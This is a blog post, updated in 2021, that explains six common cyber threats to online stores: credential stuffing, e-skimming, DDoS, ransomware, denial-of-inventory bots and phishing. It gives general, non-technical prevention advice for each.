While 2020 saw a rise in ecommerce and online activity, it came with a little-known side effect: a parallel rise in cybercrime. The FBI had reported spikes in cybercrime starting at the beginning of the Covid-19 pandemic, and after the first 100 days Mimecast reported:
- 46% increase in spam attacks
- 75% increase in impersonation attacks
- 385% increase in malware attacks
To help online retailers secure their businesses, we wanted to update our cyberattack prevention guidelines for these new threats. Below, we list the 6 biggest risks to ecommerce cybersecurity — and how to prevent them.
1. Credential Stuffing
What is Credential Stuffing?
Credential stuffing is a form of cyberfraud, or more accurately, a means to accomplish cyberfraud. It takes advantage of large data breaches to collect large amounts of usernames and passwords and then cross-references them with each other to find likely matches.
In other words, it may find a username from one data breach, and match it to that same user’s password from another data breach, in hopes that they use the same password for different accounts.
Credential stuffing is a lot more efficient and convenient than “guessing” a user’s password or using automated password generators. Not only does it have a high success rate, but it also gets more powerful with each new massive data breach.
How to Prevent Credential Stuffing?
Aside from firewalls or advanced behavioral monitoring, SMBs can use simpler solutions like multi-factor authentication (MFA), although this may upset the experience for some users. Strict password regulations, such as forbidding the use of previous passwords, can also stem credential stuffing by preventing reused passwords.
What is E-skimming?
Also known as “Magecart Attacks,” e-skimming is when a hacker intercepts a user’s sensitive data — namely credit card information — by exploiting a site’s structural weaknesses. Although e-skimming can be prevented with secure hosting, some sites and ecommerce platforms are more vulnerable than others.
How to Prevent E-skimming
The best way to prevent e-skimming is to keep your cybersecurity up-to-date. Open-source software (like WooCommerce) is more of a risk, although they have additional security plugins to compensate. Above all, make sure your hosting (or the hosting of whatever platform you’re using) is secure.
3. Distributed Denial-of-Service (DDoS)
What is DDoS?
A distributed denial-of-service attack, or DDoS, is one of the oldest cybercrimes, dating back to the mid-90s. General denial-of-service attacks (DoS) involve the malignant use of a site’s resources so that they’re unavailable for legitimate users, essentially rendering the site inaccessible. A distributed denial-of-service attack refers to when the attack comes from multiple separate sources — you have to stop them all to stop the attack.
How to Prevent DDoS
Because DDoS attacks are so sophisticated, the best way to prevent them is to use sophisticated cybersecurity infrastructure and programs. If you want to take a more hands-on approach, you could always opt for more server capacity to withstand greater traffic, as well as using a content delivery network (CDN) to alleviate the strain on your servers.
What is Ransomware?
As the name might suggest, ransomware is when a hacker “locks” files on your system, preventing you from using them unless you pay a ransom. For the right hacker, this attack can come swiftly and originate from seemingly harmless sources like clicking a malicious link or email attachment.
How to Prevent Ransomware
The good news is that you can prevent ransomware by keeping an offline backup of all your files. You can then re-upload these files to restore your system, just as you would for any other online emergency that took down your site. Just remember to back up frequently, or you’ll be stuck rebooting back to a 2013 version.
5. Denial-of-Inventory Attacks
What is Denial of Inventory?
Technically speaking, a denial-of-inventory attack is a type of denial-of-service (DoS) attack; however, it’s so particular that we wanted to give it its own section. Specifically, denial-of-inventory attacks use bots to place ecommerce items into shopping carts with no intention of buying them.
Not only does this waste resources and inhibit legitimate users like other DoS attacks, but it can also upset the availability of your products, marking them as “taken” so that the actual customers can’t add them to their cart. Denial-of-inventory attacks also ruin your analytics, throwing off your abandoned cart statistics and burning through resources like automated services for abandoned cart emails.
How to Prevent Denial-of-Inventory Attacks?
Your best protection from denial-of-inventory attacks is to use a cybersecurity program that can differentiate bots from actual users. Anything short of that requires a little luck, as these bots become more realistic every day. Other options involve regulating both how long an item can remain in an abandoned cart, as well as how many times a user can add an item.
What is Phishing?
Phishing is when a cybercriminal attempts to trick a user into divulging their username and password voluntarily — most often by pretending to work for the site. Typically phishing occurs through email or online chat, but it could conceivably happen anywhere people talk to each other.
Phishing has been a popular approach to cyber fraud for many years now. Because it preys on human error instead of technical vulnerabilities, there’s no way to completely prevent it.
How to Prevent Phishing
There’s no real software or cybersecurity measure to stop criminals from committing crimes, however, the most effective method seems to be educating your users on the dangers of phishing.
Make it clear, in no uncertain terms, that you will never ask for their username and password through email or chat. Tell them that if someone pretends to be from your site and asks for these, it is a scam. You can also teach them the typical warning signs, such as excessive typos, mismatched logos, or the message seeming out-of-the-ordinary.
Cyberattacks can be a complicated mess, especially the more technical ones including CNP fraud. Rather than taking on the hackers yourself, it’s often best to enlist the help of cybersecurity apps and software. These specialize in protecting your online store from the threats mentioned above. To get started, read our guide on Apps to Protect Retailers from Ecommerce Scams.
Editor’s Note: This blog post was originally published January 2015 and was updated in January 2021 to reflect more accurate and relevant information.